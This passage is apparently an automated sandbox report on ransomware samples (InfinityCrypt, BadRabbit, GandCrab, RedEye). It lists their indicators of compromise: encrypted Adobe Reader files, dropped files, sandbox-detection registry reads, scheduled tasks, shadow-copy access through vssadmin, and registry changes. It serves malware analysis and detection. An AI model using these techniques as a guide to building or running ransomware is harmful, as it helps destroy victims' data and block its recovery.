DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close-2.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\version.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe -
Drops file in Windows directory 21 IoCs
Processes:
taskmgr.exeSystemSettings.exeexplorer.exeSearchUI.exerundll32.exetaskmgr.exeShellExperienceHost.exeRedEye.exeBadRabbit.exeBadRabbit.exerundll32.exedescription ioc process File created C:\Windows\rescache\_merged\1601268389\1361672858.pri taskmgr.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettings.exe File created C:\Windows\rescache\_merged\3720402701\1659841449.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri explorer.exe File created C:\Windows\rescache\_merged\1601268389\1361672858.pri SearchUI.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri taskmgr.exe File opened for modification C:\Windows\infpub.dat rundll32.exe File created C:\Windows\cscc.dat rundll32.exe File created C:\Windows\rescache\_merged\4183903823\97717462.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\1361672858.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\97717462.pri taskmgr.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri SystemSettings.exe File created C:\Windows\rescache\_merged\4183903823\97717462.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\4032412167\2701812693.pri ShellExperienceHost.exe File created C:\Windows\Nope.txt RedEye.exe File created C:\Windows\dispci.exe rundll32.exe File opened for modification C:\Windows\1030.tmp rundll32.exe File created C:\Windows\rescache\_merged\4032412167\2701812693.pri explorer.exe File created C:\Windows\infpub.dat BadRabbit.exe File created C:\Windows\infpub.dat BadRabbit.exe File opened for modification C:\Windows\infpub.dat rundll32.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 7064 3760 WerFault.exe DllHost.exe 6928 7164 WerFault.exe DllHost.exe 4528 1328 WerFault.exe DllHost.exe 6508 4452 WerFault.exe DllHost.exe 6660 6604 WerFault.exe DllHost.exe 6396 6604 WerFault.exe DllHost.exe -
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exetaskmgr.exeSystemSettings.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
InfinityCrypt.exefirefox.exeGandCrab.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GandCrab.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5672 schtasks.exe 4620 schtasks.exe 3152 schtasks.exe 5352 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 212 timeout.exe 4332 timeout.exe 5176 timeout.exe 6264 timeout.exe 6900 timeout.exe 6708 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
WINWORD.EXEchrome.exeSearchUI.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 5236 ipconfig.exe -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 4248 vssadmin.exe 1688 vssadmin.exe 6620 vssadmin.exe 3692 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3516 taskkill.exe 1392 taskkill.exe 5560 taskkill.exe 5144 taskkill.exe 4332 taskkill.exe -
Processes:
explorer.exerundll32.exesetup.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\IECookies = "|affilID=|trkInfo=|visitorID=" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch setup.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" setup.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe -
Modifies data under HKEY_USERS 16 IoCs
Processes:
LogonUI.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Modifies registry class 64 IoCs
Processes:
explorer.exeSearchUI.exeSystemSettings.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\SniffedFolderType = "Generic" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 0700000006000000050000000400000003000000020000000100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\NodeSlot = "16" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202020202 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\0\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\4\MRUListEx = ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings SystemSettings.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\3\NodeSlot = "14" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 050000000400000003000000020000000100000000000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\SniffedFolderType = "Generic" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010006000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e5070c0047007500720020004e006800710076006200200046007200650069007600700072002000760066002000610062006700200065006800610061007600610074002e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000